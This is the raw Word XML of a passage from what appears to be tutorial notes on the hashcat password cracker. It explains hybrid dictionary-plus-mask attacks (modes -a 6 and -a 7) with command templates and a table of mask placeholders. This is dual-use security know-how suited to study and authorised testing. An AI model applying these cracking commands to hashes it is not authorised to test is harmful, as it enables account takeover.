          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>(?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>d?d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>?d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)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placed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>from the dictionary file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3AC78E" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="274" w:lineRule="exact"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>1234admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30069809" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10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BF862F6" wp14:editId="62F960CA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1076248</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>230928</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5589905" cy="121983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9905" cy="1219835"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FDEBF3"/>
                        </a:solidFill>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="72251ADC" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="275" w:lineRule="exact"/>
                              <w:ind w:left="28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pacing w:val="-2"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>**Note</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="14846F26" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:before="46"/>
                              <w:ind w:left="28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-a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6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→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Dictionary</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000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+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4"/>
                              </w:rPr>
                              <w:t>Mask</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="37A8B6C8" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:spacing w:before="43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hashcat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&lt;mode&gt;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hash.txt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dictionary.txt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?mask</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                          </w:p>
                          <w:p w14:paraId="5E78F66A" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:spacing w:before="86"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="61921F97" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:ind w:left="28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-a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7 →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Mask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+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Dictionary</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3DD2D0F4" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:spacing w:before="44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hashcat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-m &lt;mode&gt;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7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hash.txt ?mask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dictionary.txt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F862F6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margin-left:84.75pt;margin-top:18.2pt;width:440.15pt;height:96.0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3EPswEAAFADAAAOAAAAZHJzL2Uyb0RvYy54bWysU8GO2yAQvVfqPyDujZOsUiVWnFV301SV&#10;Vm2l7X4AxhCjYoYyJHb+vgNxklV7W/UyHmB4vPdmvL4fOsuOKqABV/HZZMqZchIa4/YVf/m5+7Dk&#10;DKNwjbDgVMVPCvn95v27de9LNYcWbKMCIxCHZe8r3sboy6JA2apO4AS8cnSoIXQi0jLsiyaIntA7&#10;W8yn049FD6HxAaRCpN3t+ZBvMr7WSsbvWqOKzFacuMUcQ451isVmLcp9EL41cqQh3sCiE8bRo1eo&#10;rYiCHYL5B6ozMgCCjhMJXQFaG6myBlIzm/6l5rkVXmUtZA76q034/2Dlt+Oz/xFYHB5goAZmEeif&#10;QP5C8qboPZZjTfIUS6TqJHTQoUtfksDoInl7uvqphsgkbS4Wy9VquuBM0tlsPlst7xbJ8eJ23QeM&#10;XxR0LCUVD9SwTEEcnzCeSy8l6TUEa5qdsTYvwr5+tIEdBTV3t/38sLsb0V+VZQVn0ol+HOqBYFNa&#10;Q3Mi5T01v+L4+yCC4sx+deRumpRLEi5JfUlCtI+Q5ymxcPDpEEGbzPaGO3pHbct6xxFLc/F6natu&#10;P8LmDwAAAP//AwBQSwMEFAAGAAgAAAAhAFcm21PhAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxM&#10;j0FLw0AQhe+C/2EZwZvdGNvQxGyKFArSQ6VV8TrNrtnU7GzIbtvor3d6EY+P+XjzvXIxuk6czBBa&#10;TwruJwkIQ7XXLTUK3l5Xd3MQISJp7DwZBd8mwKK6viqx0P5MW3PaxUZwCYUCFdgY+0LKUFvjMEx8&#10;b4hvn35wGDkOjdQDnrncdTJNkkw6bIk/WOzN0pr6a3d0ChAbK9drl282P8/vH6uXwxiXB6Vub8an&#10;RxDRcPyD4aLP6lCx094fSQfRcc7yGaMKHrIpiAuQTHMes1eQpvMZyKqU/zdUvwAAAP//AwBQSwEC&#10;LQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNd&#10;LnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8u&#10;cmVsc1BLAQItABQABgAIAAAAIQCDw3EPswEAAFADAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJv&#10;RG9jLnhtbFBLAQItABQABgAIAAAAIQBXJttT4QAAAAsBAAAPAAAAAAAAAAAAAAAAAA0EAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAGwUAAAAA&#10;" fillcolor="#fdebf3" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="72251ADC" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="275" w:lineRule="exact"/>
                        <w:ind w:left="28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C00000"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>**Note</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="14846F26" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:before="46"/>
                        <w:ind w:left="28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For</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000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-a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6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→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Dictionary</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000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+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24"/>
                        </w:rPr>
                        <w:t>Mask</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="37A8B6C8" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:spacing w:before="43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hashcat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&lt;mode&gt;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6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hash.txt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dictionary.txt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?mask</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                    </w:p>
                    <w:p w14:paraId="5E78F66A" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:spacing w:before="86"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="61921F97" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:ind w:left="28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For</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b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-a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7 →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Mask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 xml:space="preserve">+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Dictionary</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3DD2D0F4" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:spacing w:before="44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hashcat</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/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-m &lt;mode&gt;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-a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7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hash.txt ?mask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dictionary.txt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035815" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="42"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C30690" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRDefault="00000000" w:rsidP="00D44D6C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>**Miscellaneous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B659925" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C57203" w14:textId="15DF87B3" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44D6C">
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Mask placeholders (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D44D6C">
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D44D6C">
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"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"/>
        <w:gridCol w:w="3653"/>
        <w:gridCol w:w="3093"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w14:paraId="4FC60487" w14:textId="77777777" w:rsidTr="00D44D6C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61B3C16B" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Mask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4810081A" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Characters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A13AC4E" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w14:paraId="6FCBD230" w14:textId="77777777" w:rsidTr="00D44D6C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AA880DD" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>?l</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D64859D" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>abcdefghijklmnopqrstuvwxyz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04669E19" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Lowercase letters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w14:paraId="66236BD7" w14:textId="77777777" w:rsidTr="00D44D6C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="794B629C" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>?u</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C12FF85" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>ABCDEFGHIJKLMNOPQRSTUVWXYZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FE16D1A" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Uppercase letters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w14:paraId="03561459" w14:textId="77777777" w:rsidTr="00D44D6C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77ECF86F" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>?d</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5903B8A7" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>0123456789</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ECFC218" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Digits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w14:paraId="733F51C9" w14:textId="77777777" w:rsidTr="00D44D6C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1857571A" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>?s</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69B53FD5" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>!"#$%&amp;'()*+,-./:;&lt;=&gt;?@[\]^_{</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="695EC1D7" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>}~`</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w14:paraId="227A9CBE" w14:textId="77777777" w:rsidTr="00D44D6C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F316F73" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>?a</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="068D6A1E" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>u?d</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>?s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A2CC47B" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
